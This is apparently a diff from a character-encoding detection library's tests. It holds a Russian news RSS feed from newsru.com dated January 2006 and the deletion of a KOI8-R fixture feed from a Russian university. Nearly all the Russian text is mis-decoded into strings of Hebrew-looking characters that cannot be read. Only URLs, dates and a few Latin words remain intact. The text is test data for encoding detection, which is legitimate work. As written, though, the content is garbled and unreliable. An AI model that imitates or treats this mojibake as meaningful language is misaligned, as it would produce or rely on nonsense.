+0300 - - - - - עֿ׃׃ֹׁ־ֵ ־ֱ׳ֱֹּ ׃ֱֵֽ ֹ־װֵֵׂ׃־ֵ ֶֹּ״ֽ, ֻ־ַֹֹ, ײױׂ־ֱּ ֹ װֵֵּ׀ֱִֵֵֹׂ ׳ 2005 ִַֿױ - http://www.newsru.com/cinema/03jan2006/best.html - ץֱ׃װ־ֹֹֻ ֿ׀ֿׂ׃ֱ, ׀ֿׂ׳ִֵֵ־־ַֿֿ ב־ֱֹּװֵֹ׃ֹֻֽ ֳֵ־װֽֿׂ אֹׁׂ לֵ׳ֱִ, ׀ֿ׀װֱֹּ׃״ ־ֱ׳ֱװ״ ׃ֱֽ ֹ־װֵֵׂ׃־ ֶֹּ״ֽ, ֻ־ַֹױ, װֵֵּ׀ֱַֽֽֿׂׂױ ֹ ײױׂ־ֱּ. נֱֵֹֽׂװֵּ״־ֿ, װֿ ֿ׃־ֿ׳־ֿ ֿװ׳ֵװ ־ֱ ׳׃ֵ 4 ׳ֿ׀ֿׂ׃ֱ - "ֱװׂױִ־ְׁ׃״ ֿװ׳ֵװֹװ״". - כױּ״װױֱׂ - Tue, 3 Jan 2006 14:22:00 +0300 - - - - - - - ק ־ֿ׳ֽֿ ִַֿױ ־ֱ םכף ַֽֿױװ ֿװֵֽ־ֹװ״ "׃ױָֿ ֱֻֿ־" - http://www.newsru.com/russia/03jan2006/mks.html - -ץײֵ ׀ׁװ״ ֵּװ ׃ ֵֽֽֿ־װֱ, ֱִַֻֿ םכף ׃װֱֱּ ֲֹֿװֱֵֽֿ, ־ֱ ־ֵ ִֵ׃װ׳ױֵװ ײֵ׃װֱֹֿ ֱ׀ֵׂװ ־ֱ ֱַֻּּֿֿ״. נֿ ׃ּױֱָֽ, ׀ֵׂ׳ֽ ׀ֿ׃ֱֲֵּּ־ֵֹֽ ׃װֱֱּ ִֿ׃װֱ׳ֱֻ ־ֱ ֲֿׂװ ֱִֻּֿֿ־ָ ֻֿ־ֵֶװ ׃ ֵֹֻּֽֿׂ. מֿ ֱִײֵ װֿ ֱֳֶֹֹּֿ״־ֿ ׀ִֿװ׳ִֵֹׂװ״ ־ֵ׳ֽֿֿײ־ֿ, ׳ִֵ״ ־ֱׂױֹװֵּֽׁ ַֹֿׂװ ־ִֵֵֵּֽ־־ֵֿ ױ׳ּֿ״־ֵ־ֵֹ. - ק עֿ׃׃ֹֹ - Tue, 3 Jan 2006 13:48:00 +0300 - - - - - - - Maariv: ץ׃ֱֱֽ ֲֵ־ לֱִֵ־ ױײֵ 3 ֱִַֿ ײֹ׳ֵװ ׳ יֱֵֹּׂ - http://www.newsru.com/world/03jan2006/laden.html - -חֱׂײֱִ־ֹ־ בֱֶַ־ֹ׃װֱ־ֱ ץ׃ֱֱֽ ֲֵ־ לֱִֵ־ ׳ֱֵָּ ׳ יֱֹּׂ״ ׀ֿ װױֹׂ׃װֵֹ׃ֻֿ ׳ֵֹ ֵֵׂ ִַֿ ֹ װֹׂ ִ־ׁ ׀ֿ׃ֵּ װֱֵֻׂװֿ׳ 11 ׃ֵ־װֲׁׁׂ 2001 ֱִַֿ ׳ ףב, ׀ִֵֵׂ ֱֱֵֹֻֽׂ־׃ֹֻֽ ׳װֿׂײֵ־ֵֹֽ ׳ יֱֻׂ. וַֿ ׳ִֵ ֹ יֱֹּׁׂ ־ֵ ֲּ ֱֶֹֻ׃ֹֿׂ׳ֱ־. - ק ֵֹֽׂ - Tue, 3 Jan 2006 13:32:00 +0300 - - - - - עֿ׃׃ֹׁ־ֵ ־ֱ׳ֱֹּ ׃ֱָֽ ױֽ־ָ, ׃ֵָּֽ ֹ ׃ֵֻ׃ױֱּ״־ָ ׀ֹּֿװֹֻֿ׳ ׃װֱׂ־ - http://www.newsru.com/russia/03jan2006/politics.html - ב־ֱֹּװֵֹ׃ֹֻ ֳֵ־װׂ אֹׁׂ לֵ׳ֱִ ׀ֿׂ׳ֵּ ֿ׀ֿׂ׃ ׃ִֵֹׂ ֿׂ׃׃ֹׁ־ ׳ ֻֿ־ֳֵ 2005 ֱִַֿ. עֵ׃׀ֿ־ִֵ־װ ֿװ׳ֵװֹֹּ ־ֱ ׳ֿ׀ֿׂ׃ ֿ ׃ֱָֽ ֵ׃װ־ָ, ׃ֵָּֽ, ױֽ־ָ ֹ ׃ֵֻ׃ױֱּ״־ָ ׀ֹּֿװֱָֹֻ. יֹֽ ׃װֱֹּ נױװֹ־ ֹ צֹֹׂ־ֿ׳׃ֹֻ. כֵֽֿׂ װַֿֿ, ֿׂ׃׃ֹׁ־ֵ ־ֱ׳ֱֹּ עֱֽֿ־ֱ בֱֲֽֿׂ׳ֱֹ ׃ֱֽֽ ֱֲַֿװֽ ֵּֿ׳ֵֻֽֿ ׃װֱׂ־. - ק עֿ׃׃ֹֹ - Tue, 3 Jan 2006 13:05:00 +0300 - - - - - - - - ק Windows ־ֱִֵ־ֱ ֿ׀ֱ׃־ֱׁ ױׁ׳ֹֽֿ׃װ״, ױַֿׂײְֱֱׁ ׀ֿװֹ ׳׃ֵֽ ֻֽֿ׀״ְװֱֵֽׂ ־ֱ ׀ֱּ־ֵװֵ - http://www.newsru.com/world/03jan2006/windows.html - לְֲֿ ֹ ֹֹּּֽֿ־ֿ׳ ֻֽֿ׀״ְװֵֿׂ׳ ׀ִֿ ױ׀ֱׂ׳ֵּ־ֵֹֽ ןף Windows ֽֿײֵװ ֲװ״ ֱװֱֻֿ׳ֱ־ ׀ֽֿׁׂ ׃ֱֵ׃, ׀ֵֹװ ֱֵַװֱ Financial Times. בװֱֱֻ ׀ֹֿׂ׃ִָֹֿװ ׀ױװֵֽ ׳־ֵ׃ֵ־ֹׁ ׳ִֵֿׂ־ֿ׃־ַֿֿ ֱִֻֿ ׳ ֲֿ־ױְ ֱֻׂװֹ־ֻױ. װֿ ֽ־ֱַֻֿֿׂװ־ֿ ױ׳ֵֹֹּ׳ֱֵװ ֿ׀ֱ׃־ֿ׃װ״ ֱֱׂײֵ־ֹׁ. כֵֽֿׂ װַֿֿ, Microsoft ׀ֱֻֿ ־ֵ ׳׀ױ׃װֱֹּ ֹ׃׀ֱׂ׳ֵּ־ֵֹ, ֱֻׂ׳ְֱֵֵ "ִׂױ". - ק ֵֹֽׂ - Tue, 3 Jan 2006 12:25:00 +0300 - - - - - - - Die Presse: נױװֹ־ - ׳ֱּ׃װֵֹּ־ ַּֿױֲַֿֿ ַֿ־ׁ - http://www.newsru.com/russia/03jan2006/putingas.html - "חֱ׀ֽֿׂ" &#8211; װֿ ֱַּ׳־ֵֿ ֿׂױײֵֹ נױװֹ־ֱ ׳ ֲֿׂ״ֲֵ ֱ ׳ֹּׁ־ֵֹ ֹ ׳ֱּ׃װ״. ף װֵָ ׀ֿׂ ֱֻֻ "חֱ׀ֽֿׂ" ׀ֹֿׂ׃װֱ־ֿ׳ֹּ ׃־ֱֲײֵ־ֵֹ ץֱֹֻׂ־ ׀ִֹֿׂׂ־ֽ ֱַֽֿ, ײֹ־״ ׳ ֳֵ־װֱּׂ״־ֿ ִֹ׃׀ֵװֵׂ׃ֻֿ ֽֿ־ֿ׀ֹֹּֿ, ־ֵ׃ֽֿװׁׂ ־ֱ ־ֿ׳ִַֿֿ־ֵֹ ׀ֱִׂ־ֹֹֻ, ֲ״ֵװ ְֻּֽֿ. - ק עֿ׃׃ֹֹ - Tue, 3 Jan 2006 12:13:00 +0300 - - - - - - - י ׀ױ־ֻװֱ ֲֵֽֿ־ֱ ׳ְֱּװ ׳ םֿ׃ֻ׳ֵ ׀ֵָֹֿ־ֿ 35 װ׃ׁ ֱִּּֿֿׂ׳ - http://www.newsru.com/crime/03jan2006/grab.html - ה׳ֵֿ ־ֵֹ׳ֵ׃װ־ָ ׳ֵֵֽֿׂ ׳ ׀ֿ־ִֵֵּ״־ֹֻ ׃ֿ׳ֵֹֹּׂ ֱֲֿׂ־ֵֿ ־ֱ׀ֱִֵ־ֵֹ ־ֱ ׀ױ־ֻװ ֲֵֽֿ־ֱ ׳ְֱּװ ־ֱ גֿֿׂ׳׃ֻֽֿ ֿ׃׃ֵ. כֱ׃׃ֱֹׂ ױֱִֹֹּׂ ׀ֿ ַּֿֿ׳ֵ ֹ ׃׳ֱֹּׁ. - כֹֹֽׂ־ֱּ - Tue, 3 Jan 2006 12:03:00 +0300 - - - - - ק ףב ֻֿװ ׃׀ֱ׃ ײֹ־״ ָֹֿׁ־ױ, ׀ֿ׳ֿ־ֹ׳ ׀ֿ װֵֵֶּֿ־ױ ׳ ׃ּױײֲױ 911 - http://www.newsru.com/world/03jan2006/cat.html - 50 ֵּװ־ֹ חֱֹׂׂ עֵֿֿ־ ױ׀ֱּ ׃ ֹ־׳ֱִֹּ־ַֿֿ ֵֻׂ׃ֱּ ֹ ־ֵ ַֽֿ ׀ִֿ־ׁװ״׃ׁ ֹ-ֱ ׃ּױֹ׳ֵַֿ׃ׁ ֹֹֻֽֿׂ־׃ױּ״װֱ. טֹֿׁ־ ײֹ׳ֿװ־ַֿֿ ׀ֹׂ־ֱּ׃ׁ, װֿ ׃׀ֱֳֵֹּ״־ֿ ׀װֱּ׃ׁ ֲֿױֹװ״ ֻֿװֱ ־ֱײֱֹֽװ״ ־ֱ װֵֵֶּֿ־ֵ ֻ־ֿ׀ֻױ ׀ַֽֿֿׁׂ ׳ֿ־ֱֻ ׳ ׃ּױײֲױ 911, ־ֿ ־ֱֹֻֻ ־ֵ ֱׂ׃׃ֹװ׳ֱּ, װֿ ֻֿװ ִֵ׃װ׳ֹװֵּ״־ֿ ׃ֽֿײֵװ װֿ ׃ֱִֵּװ״. - ק ֵֹֽׂ - Tue, 3 Jan 2006 11:42:00 +0300 - - - - - - - - - מֱֳֵֵֻֽׁ ׀ֱֱׂ ֱֽױֿׂ׳ֱֱּ ׳ ֲֵװֿ־ ִ׳ױָ ִֵװֵ - http://www.newsru.com/crime/03jan2006/germanz.html - ף ׀ֹׂ־ֱ־ֵֹֽ ׳ ׀ֱׂ׳ֱָֿֿׂ־ֹװֵּ״־ֵ ֱַֿׂ־ ׁ׳ֹּ׃ׁ ֽױײֹ־ֱ. ן־ ׃ֲֹּֿֿ, װֿ ׳ ׃ִֵֵֹׂ־ֵ 1990-ָ ִַֿֿ׳ ֿ־ ֱָֿֿׂ־ֹּ ִ׳ױָ ִֵװֵ ׳ ׀ִֿ׳ֱֵּ ֱִֽֿ. פֱֵּ ִֵװֵ ֲֹּ ׃׀ׁׂװֱ־ ׳ ֽױ׃ֿׂ־ ׀ֱֵֻװ ֹ ֱֽױֿׂ׳ֱ־. - כֹֹֽׂ־ֱּ - Tue, 3 Jan 2006 11:24:00 +0300 - - - - - םיה ֲֿ׳ֹ־ֵׁװ פֲֹֹּ׃ֹ ׳ ֱׂ׃ֻׂױֹ׳ֱ־ֹֹ ֱ־װֹֿׂ׃׃ֹ׃ֻֿ ֱֻֽ׀ֱ־ֹֹ - http://www.newsru.com/russia/03jan2006/gruz.html - פֲֹֹּ׃ֹ ֱׂ׃ֻׂױֹ׳ֱֵװ ֱ־װֹֿׂ׃׃ֹ׃ֻױְ ֱֻֽ׀ֱ־ְֹ. חֿ׳ֹֿׂװ״ ֿ ׃ֱָֻֿׂ ׀ִֿ׀ֹ׃ֱ־ֹׁ ֿׂ׃׃ֹ׃ֻֿ-ַׂױֹ־׃ַֻֿֿ הַֿֿ׳ֱֿׂ ֿ ִׂױײֲֵ ֽֿײ־ֿ װּֿ״ֻֿ ׀ֿ׃ֵּ ־ֱֱֳֹֹֹּֽֿׂ ֱװֽֿ׃ֵֶׂ ׳ ִ׳ױ׃װֿֿׂ־־ָֹ ֿװ־ֵֿ־ָֹׁ, ־ֱ׃װֱֹ׳ֱֵװ םיה. - ק עֿ׃׃ֹֹ - Tue, 3 Jan 2006 11:04:00 +0300 - - - - - - - עֱ׃װֵװ ֹ׃ּֿ ׀ֲַָֹֹֿ ׳ ֵׂױּ״װֱװֵ ֲֿ׳ֱֱּ ֹֻׂ ֱֻװֱֻ ׳ גֱ׳ֱֹֹׂ - http://www.newsru.com/world/03jan2006/de.html - נֿ ֵֵֽׂ ׀ִּֿֿׂײֵ־ֹׁ ׃׀ֱ׃ֱװֵּ״־ָ ֱֲֿׂװ ־ֱ ֵֽ׃װֵ ֲֿׂױֵ־ֹׁ ֹֻׂ ׃׀ֿׂװֻֽֿ׀ֵֻּ׃ֱ ׳ ֵֽ׃װֵֵֻ גֱִ עֱֵָ־ֱָּ״ ׃׀ֱ׃ֱװֵֹּ ֹ׳ְֱֵֻּװ ֹ-׀ִֿ ֱ׳ֱּֿ׳ ׳׃ֵ ־ֿ׳ֵ װֱֵּ. נֿ ׀ֿ׃ִֵּ־ֹֽ ֱִ־־ֽ, ֹ׃ּֿ ׀ֲַָֹֹֿ ִֿ׃װַֹּֿ 15 ֵּֿ׳ֵֻ. גֵֵּֿ 30 ֵּֿ׳ֵֻ ׀ּֿױֹֹּ ֱׂ־ֵ־ֹׁ. ‏ֵװ׳ֵֿׂ ׃ֹװְֱװ׃ׁ ׀ֿׂ׀ֱ׳ֹֹֽ ֲֵ ׳ֵ׃װֹ. - ק ֵֹֽׂ - Tue, 3 Jan 2006 10:52:00 +0300 - - - - - - - - - - - - - - - - - - - - ה׳ֵֿ ׳ֵֿ־־ֿ׃ּױײֱָֹ ׀ֲַֹֹּֿ ־ֱ כננ ׳ ‏ֵ־ֵ - http://www.newsru.com/russia/03jan2006/chechen.html - נִֿ׳ֵַׂ׃ׁ ֲֿ׃װֵּׂױ כננ ־ֱ ֱֹֻֿׂ־ֵ ֱֳֵׂ־װֱׂ כױֱּֿׂ. מֵֹ׳ֵ׃װ־ֵ ֱֳֹּ ֹ ֱ׳װֱֽֿװֵֹ׃ַֻֿֿ ֿׂױײֹׁ ֲֿ׃װֵֹּּׁׂ ־ֱִׁׂ ׳ֵֿ־־ֿ׃ּױײֱָֹ ק־ױװֵׂ־־ָֹ ׳ֿ׃ֻ, ֿ׃ױֵ׃װ׳ּׁ׳ֹ ִֿ׃ֽֿװׂ ֱ׳װֿװֱׂ־׃׀ֿׂװֱ. - ק עֿ׃׃ֹֹ - Tue, 3 Jan 2006 10:34:00 +0300 - - - - - קׂ׳ ־ֱ ֱָװֵ ׳ ףב: 13 ַֿׂ־ֻֿׁ׳ ׀ֿׂ׀ֱֹּ ֲֵ ׳ֵ׃װֹ - http://www.newsru.com/world/03jan2006/mine.html - קׂ׳ ׀ֵֹּֿֿׂ ־ֱ ױַּֿ״־ֿ ֱָװֵ ׳ תֱ׀ֱִ־ֿ קִֹׂײֹ־ֹֹ. ף׀ֱ׃ֱװֵּֽׁ ׀ֱֻֿ ־ֵ ױֱִֵװ׃ׁ ױ׃װֱ־ֿ׳ֹװ״ ֻֿ־װֱֻװ ׃ ַֿׂ־ֱֹֻֽׁ, ֻֿװֵֿׂ ׀ִֵׂ׀ּֿֿײֹװֵּ״־ֿ ֲֹֻּֿֿׂ׳ֱ־ ־ֱ ַּױֲֹ־ֵ ׳ 80 ֵֽװֿׂ׳. - ק ֵֹֽׂ - Tue, 3 Jan 2006 10:21:00 +0300 - - - - - - - - "חֱ׀ֽֿׂ": ץֱֹֻׂ־ֱ ׀ִּֿֿׂײֱֵװ ׳ֿֿׂ׳ֱװ״, ־ֿ ׀ֿ׃װֱ׳ֱֻֽ װֿ ־ֵ ׀ֱֵֵֽֿװ - http://www.newsru.com/finance/03jan2006/gas.html - נִֵֵֹׂ־װ ץֱֹֻׂ־ אֵ־ֻֿ ױװ׳ֵׂײֱִֵװ, װֿ ֱַֿװֱׂ־׃׀ֿׂװ־ֱׁ ׃ֹ׃װֱֵֽ ׃װֱׂ־ ֲֵֿ׃׀ֵֹ׳ֱֵװ װֱׂ־ֹװ. "חֱ׀ֽֿׂ" ֱֲֵֵֿװ ֵ׳ֿׂ׀ֵ׃ֹֻֽ ׀ֿװֲֵֹׂװֵּֽׁ ֻֽֿ׀ֵ־׃ֱֳֹֹ, ױװ׳ֵׂײֱִׁ, װֿ ץֱֹֻׂ־ֱ ׀ִּֿֿׂײֱֵװ ־ֵ׃ֱ־ֳֹֻֿ־ֹֿׂ׳ֱ־־ֿ ֿװֱֲֹׂװ״ ֿׂ׃׃ֹ׃ֹֻ ֱַ. - ֻֿ־ֱֹֻֽֿ - Tue, 3 Jan 2006 10:11:00 +0300 - - - - - - - - - ף׀ֳֵֿ׀ֱֳֵֹׁׂ ׳ הֱֵַ׃װֱ־ֵ: ױֲֹװ 5 ֲֵֿ׳ֹֻֿ׳ ֹ 2 ֳֹֹֹּֽֿ־ֱֵׂ - http://www.newsru.com/russia/03jan2006/oper.html - ק ִֵָֿ ֱֽ׃װֱֲ־ֿ ׃׀ֳֵֿ׀ֱֳֵֹֹׂ ׀ֿ ֲֹֻּֿֿׂ׳ֱ־ְֹ ַׂױ׀׀ ֲֵֿ׳ֹֻֿ׳ ׳ ץ־ֳױֻױּ״׃ֻֽֿ ֱֿׂ־ֵ הֱֵַ׃װֱ־ֱ ֱׂ־ֵ־ֹׁ ׀ּֿױֹֹּ 7 ׃ֿװׂױִ־ֹֻֿ׳ ׀ֱׂ׳ֱָֿֿׂ־ֹװֵּ״־ָ ֱַֿׂ־ֿ׳, ִ׳ֵֿ ֹ ־ָֹ ׃ֻֿ־ֱֹּ׃״. נֿװֵֹׂ ֲֵֿ׳ֹֻֿ׳ ֳֵֿ־ֹ׳ְֱװ׃ׁ ׳ ׀ׁװ״ ױֲֹװָ. בֻװֹ׳־ֱׁ ֱֱֶ ׃׀ֳֵֿ׀ֱֳֵֹֹׂ ׃ ־ֱ׃װױ׀ֵּ־ֵֹֽ װֵֽ־ֿװ ׀ֹֿׂ׃װֱ־ֿ׳ֵּ־ֱ. - ק עֿ׃׃ֹֹ - Tue, 3 Jan 2006 09:48:00 +0300 - - - - - - - - כ 2050 ִַֿױ ׳ ֵֹֽׂ ׀ֿׁ׳ׁװ׃ׁ ־ֿ׳ֵ ׃׳ִֵֵָׂׂײֱ׳. עֿ׃׃ֹׁ ׀ִּֿֿׂײֹװ ׀ֿ׃װֵ׀ֵ־־ֿ ׳ֱֹֽׂװ״ - http://www.newsru.com/world/03jan2006/future.html - כֹװֱ ֻ 2050 ִַֿױ ׃װֱ־ֵװ ׃ֱֽֿ ֽֿ־ֿ ֻֿ־ֵֹֽֿ׃ֻֿ ִֵׂײֱ׳ֿ ׀ֱּ־ֵװ, י־ִֹׁ - ֹֽֿׂ׳ֽ ִֵֹּֽֿׂ ׀ֿ ֹ׃ֵּ־־ֿ׃װֹ ־ֱ׃ֵֵּ־ֹׁ, װֱִַֿ ֱֻֻ עֿ׃׃ֹׁ ׃ ױֵֽ־״ֹ׳ֹֽ׃ׁ ־ֱ׃ֵֵּ־ֵֹֽ ׳ִֵֿװ ׳ ִֵ׃ׁװֻױ ׀ֿ ֹֽֿ ֻֿ־ֹֹֻֽֿ. - ק ֵֹֽׂ - Tue, 3 Jan 2006 09:42:00 +0300 - - - - - - - מֱ׳ִֿ־ֵ־ֵֹ ׳ י־ִֿ־ֵֹֹ: ֹ׃ּֿ ׀ֲַָֹֹֿ ׀ֵׂ׳׃ֹּֿ 50 ֵּֿ׳ֵֻ - http://www.newsru.com/world/03jan2006/flood.html - י-ֱ ׀ִּֿֿׂײֱ׳ָֹ׃ׁ ִ׳ֱ ִ־ׁ ׀ִִֿׁׂ ִֿײִֵ ׳ ֱֿׂ־ֵ נֱ־װֹ ׀ֵֹּֿֿׂ ֱַַֹ־װ׃ֹֻ ֿ׀ֵּֿ־״ ֹ ׳ֱּ ֹ ֲֵֵַֿׂ׳ ֱֵֻׂ, ׳ ֵׂױּ״װֱװֵ ֵַֿ ֽֿ־ֵ ׀ֿװֹֻֿ ׳ִֿ ֹ ַֹׁׂ ֲֿׂױֹֹּ׃״ ־ֱ ־ֵ׃ֻּֿ״ֻֿ ֲֵֹּּײֱָֹ ִֵֵׂ׳ֵ־״. - ק ֵֹֽׂ - Tue, 3 Jan 2006 09:26:00 +0300 - - - - - - - - ק םֿ׃ֻ׳ֵ ׳ֿ ׳װֿׂ־ֹֻ ֲױִֵװ ֽֿֿׂ־ֿ - http://www.newsru.com/russia/03jan2006/pogoda.html - ק ׃װֳֵֹּֿ ׃װֲֹֻּֿ װֵֵֽֽֿׂװֱׂ ־ֵ ֿ׀ױ׃װֹװ׃ׁ ־ֹײֵ ֿװֵֽװֹֻ 1-3 ֱִַׂױ׃ֱ ֱֽֿֿׂ, ֱ ׀ֿ ֱֲּֿ׃װֹ - 1-6 ֱִַׂױ׃ֿ׳. קֵװֵׂ ֲױִֵװ ְַֿ-׳ֿ׃װֿ־ֽ, ױֵֵֽׂ־־ֽ ֹ ־ֵ ׀ֵׂ׳׃ֹװ 3-8 ֵֽװֿׂ׳ ׳ ׃ֵֻױ־ִױ. - ק עֿ׃׃ֹֹ - Tue, 3 Jan 2006 09:15:00 +0300 - - - - - diff --git a/chardet/tests/KOI8-R/susu.ac.ru.xml b/chardet/tests/KOI8-R/susu.ac.ru.xml deleted file mode 100644 index e4e4d2f..0000000 --- a/chardet/tests/KOI8-R/susu.ac.ru.xml +++ /dev/null @@ -1,190 +0,0 @@ - - - - -ru -press@susu.ac.ru (דֵ־װׂ ֹ־ֱֳֶֹֹֽֿׂ ֹ ׃׳ֵׁ ׃ ֲֵֿ׃װ׳ֵ־־ֿ׃װ״ְ) -webmaster@urc.ac.ru (ןװִֵּ ֱֲַּּֿ״־ָ ׃ֵװֵ׳ָ װֵָ־ַֹּֿֿ) -http://susu.ac.ru/gerb2.gif -אײ־ֿ-ץֱּׂ״׃ֹֻ ַֿ׃ױֱִׂ׃װ׳ֵ־־ ױ־ֹ׳ֵׂ׃ֹװֵװ -http://susu.ac.ru/ -מֿ׳ֿ׃װֹ אץׂחץ -http://susu.ac.ru/ru/news/ -מֿ׳ֿ׃װֹ אײ־ֿ-ץֱּׂ״׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ױ־ֹ׳ֵׂ׃ֹװֵװֱ (‏ֲֵֹּׁ־׃ֻ) -~220 V, 50 Hz -1995-2004 אײ־ֿ-ץֱּׂ״׃ֹֻ ַֿ׃ױֱִׂ׃װ׳ֵ־־ ױ־ֹ׳ֵׂ׃ֹװֵװ -Thu, 10 Mar 2005 15:45:45 +0500 - -Thu, 29 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1329 -מֱֱַׂײִֵ־ ׀ֲִֵֹֿװֵֹּ ֻֿ־ֻױׂ׃ֱ ׃ֱװֿ׳ -29 ֱֲִֵֻׁׂ ׳ ֱֵּ ֱ׃ֱִֵ־ֹ ץ£־ַֿֿ ׃ֿ׳ֵװֱ אײ־ֿ-ץֱּׂ״׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ׃ֿ׳ֵװֱ ׃ֿ׃װֱּֿׁ׃״ ֳֵֵֽֿׂ־ֹׁ ־ֱֱַׂײִֵ־ֹׁ ׀ֲִֵֹֿװֵֵּ ֻֿ־ֻױׂ׃ֱ ׃ֱװֿ׳ «קֲֵ-׃װֹֿׂװֵּ״׃װ׳ֿ. ףֱִֵּ ׃ֱֽ». - -ק ֻֿ־ֻױׂ׃ֵ ׀ֹׂ־ֹּׁ ױֱ׃װֵֹ ֻּֿֿֿ 70 ׃ֱװֿ׳, ׃ֱִֿ־־ָ ׃װױִֵ־װֱֹֽ, ׀ֵׂ׀ֱִֿ׳ֱװֵֹּֽׁ... -29 ֱֲִֵֻׁׂ ׳ ֱֵּ ֱ׃ֱִֵ־ֹ ץ£־ַֿֿ ׃ֿ׳ֵװֱ אײ־ֿ-ץֱּׂ״׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ׃ֿ׳ֵװֱ ׃ֿ׃װֱּֿׁ׃״ ֳֵֵֽֿׂ־ֹׁ ־ֱֱַׂײִֵ־ֹׁ ׀ֲִֵֹֿװֵֵּ <a href=""http://konkurs.susu.ru/"">ֻֿ־ֻױׂ׃ֱ ׃ֱװֿ׳ «קֲֵ-׃װֹֿׂװֵּ״׃װ׳ֿ. ףֱִֵּ ׃ֱֽ»</a>. - -ק ֻֿ־ֻױׂ׃ֵ ׀ֹׂ־ֹּׁ ױֱ׃װֵֹ ֻּֿֿֿ 70 ׃ֱװֿ׳, ׃ֱִֿ־־ָ ׃װױִֵ־װֱֹֽ, ׀ֵׂ׀ֱִֿ׳ֱװֵֹּֽׁ ֹ ׃ֿװׂױִ־ֱֹֹֻֽ אץׂחץ. - -נִֵׂ׃ֱִֵװֵּ״ ײְֹׂ, ׀ֵֻֿׂׂװֿׂ ׀ֿ ױֲֵ־ֿ ֱֲֿׂװֵ בֵֻּ׃ֱ־ִׂ י׳ֱ־ֿ׳ֹ ףִֹֿֿׂ׳ ׳ׂױֹּ ־ֱֱִַׂ ׀ֲִֵֹֿװֵּֽׁ: -<ul><li>ץֲֵ־ֵ ׃ֱװ<ol><li><a href=""http://www.tipilp.susu.ac.ru/"">כֱֱִֵֶׂ פֵָ־ַֹֹּֿֿ ֹ ׀ֵֻֿׂװֹֿׂ׳ֱ־ֹׁ ִֵֹֹּ ּ£ַֻֿ ׀ֵּֽֿׂ־־ֿ׃װֹ</a></li><li><a href=""http://model.exponenta.ru/"">Model.Exponenta.Ru — ׃ֱװ ֿ ִֵֹּֽֿֿׂ׳ֱ־ֹֹ ׃ֹ׃װֵֽ ֹ ׁ׳ֵּ־ֹ</a></li><li><a href=""http://www.math.susu.ac.ru/~abel"">ֲֵּ״ ב־ִֵׂ בֵֻּ׃ֱ־ִֿׂ׳ֹ</a></li></ol><ul><li><a href=""http://www.tvr.susu.ac.ru/"">ףֱװ װֱִֵֵֹֻּֽֿֿׂ׀ֱ־ֹֹ «אץׂחץ-פק»</a></li></ul></li> -<li>נֱַֿׂ־ֹ־ֱׁ װֱֵֽװֱֹֻ. ף׀ֳֵ׀ֹׂ<ul><li><a href=""http://urbans.susu.ru/"">ב־׃ֱֲּֽ״ ׃ֿ׳ֵֵֽׂ־־ַֿֿ װֱ־ֱֳ «Urban Dance»</a></ul></li><li>עֱ׳ֱֵֻּװֵּ״־ֵ ׃ֱװ<ol><li><a href=""http://www.goffman74.narod.ru/"">ףֱװ ֵֽײִױ־ֱִֿׂ־ַֿֿ װֱֵװֱּׂ״־ַֿֿ ֵֶ׃װֹ׳ֱּׁ «GOFFMAN» ׳ ‏ֲֵֹּׁ־׃ֵֻ</a></li><li><a href=""http://modula-2.ru/"">ןֱֳֶֹֹּ״־ ׃ֱװ ַׂױ׀׀ Modula-2</a></li><li><a href=""http://ac377.susu.ru/"">Cֱװ ַׂױ׀׀ בף-477 בָֹׂװֵֻװױׂ־ֿ-׃װֹֿׂװֵּ״־ַֿֿ ֱֶֻױּ״װֵװֱ אץׂחץ</a></li></ol><ul><li><a href=""http://www.dreamxaos.narod.ru/"">DreamXaoS</a></li> -<li><a href=""http://www.lpool.nm.ru/"">׀ֵֻֿׂװ ִֵ־ֹ׃ֿ׳ֱ ֱֵַֿׂ |2005|</a></li></ul></li><li>נֹׂ ֹׂװֵּ״׃ָֹֻ ׃ֹֽ׀ֱװֹ<ul><li><a href=""http://www.math.susu.ac.ru/~abel"">ֲֵּ״ ב־ִֵׂ בֵֻּ׃ֱ־ִֿׂ׳ֹ</a></li><li><a href=""http://mexmat4.narod.ru/"">.::: #םֵָםֱװ ִּׁ ־ֱֱִֿׂ :::.</a></li></ul></li><li>ק־ֵ ֻֿ־ֻױׂ׃ֱ<ol><li><a href=""http://www.licey97.ru/"">ןֱֳֶֹֹּ״־ ׃ֱװ ׀ֹּֿװֵָ־ֵֹ׃ַֻֿֿ ֳֵֹּׁ ¹ 97</a></li><li><a href=""http://chelmetro.da.ru/"">‏ֲֵֹּׁ־׃ֹֻ ֵֽװֿׂ׀ֹּֿװֵ־</a></li></ol></li> -</ul> -http://susu.ac.ru/ru/news/1329 - - -Thu, 29 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1331 -לְֳֵֹֻ ׳ אץׂחץ ׀ֿׂװֵװ ׃װֱֹׂ ־ֱױ־ ׃ֿװׂױִ־ֹֻ חֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ֹֽׂװֱײֱ -6 ׁ־׳ֱׁׂ ׳ קֹׂװױֱּ״־ֽֿ ֱֵֶֹֹּּ עױ׃׃ַֻֿֿ ֽױֵׁ (נױֹֻ־׃ֹֻ ֱּ אץׂחץ, ֱױִ. 244) ׃ֿ׃װֹֿװ׃ׁ ֳֵֹֻּׁ ־ֱ װֵֽױ: «נֲֵּֽֿׂ ׃ֿ׳ֵֵֽׂ־־ַֿֿ ֹױֵ־ֹׁ ֱ־װֹ־ַֿֿ ֹ׃ֻױ׃׃װ׳ֱ». - -‏ֹװֱֵװ ׃װֱֹׂ ־ֱױ־ ׃ֿװׂױִ־ֹֻ חֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ֹֽׂװֱײֱ, ֳִֵֿ־װ ֱִֵֶֻׂ ֱׂױֲֵײ־ַֿֿ ֹ׃ֻױ׃׃װ׳ֱ... -6 ׁ־׳ֱׁׂ ׳ קֹׂװױֱּ״־ֽֿ ֱֵֶֹֹּּ עױ׃׃ַֻֿֿ ֽױֵׁ (נױֹֻ־׃ֹֻ ֱּ אץׂחץ, ֱױִ. 244) ׃ֿ׃װֹֿװ׃ׁ ֳֵֹֻּׁ ־ֱ װֵֽױ: «נֲֵּֽֿׂ ׃ֿ׳ֵֵֽׂ־־ַֿֿ ֹױֵ־ֹׁ ֱ־װֹ־ַֿֿ ֹ׃ֻױ׃׃װ׳ֱ». - -‏ֹװֱֵװ ׃װֱֹׂ 